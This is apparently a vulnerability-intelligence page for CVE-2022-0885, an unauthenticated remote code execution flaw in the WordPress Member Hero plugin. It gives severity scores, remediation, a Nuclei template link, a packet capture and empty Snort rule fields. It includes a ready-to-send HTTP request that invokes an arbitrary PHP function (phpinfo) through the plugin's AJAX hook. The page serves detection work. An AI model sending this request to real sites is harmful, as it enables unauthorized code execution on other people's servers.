🔙 목록으로 돌아가기

CVE-2022-0885: Member Hero <=1.0.9 - Remote Code Execution

TitleMember Hero <=1.0.9 - Remote Code Execution
Authortheamanrawat
SeverityCritical
ImpactAn attacker can execute arbitrary code on the target system, potentially leading to a complete compromise of the WordPress site.
RemediationUpdate to the latest version of the Member Hero plugin (1.0.9 or higher) to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.87398
CVE IDCVE-2022-0885
CWE IDCWE-862
Tags cve cve2022 unauth wpscan wp-plugin rce wp wordpress member-hero memberhero vkev vuln

🔍 Vulnerability Description

WordPress Member Hero plugin through 1.0.9 is susceptible to remote code execution. The plugin lacks authorization checks and does not validate the a request parameter in an AJAX action, allowing an attacker to call arbitrary PHP functions with no arguments. An attacker can thus execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.

🌐 HTTP Request

GET /wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-0885.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-0885.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A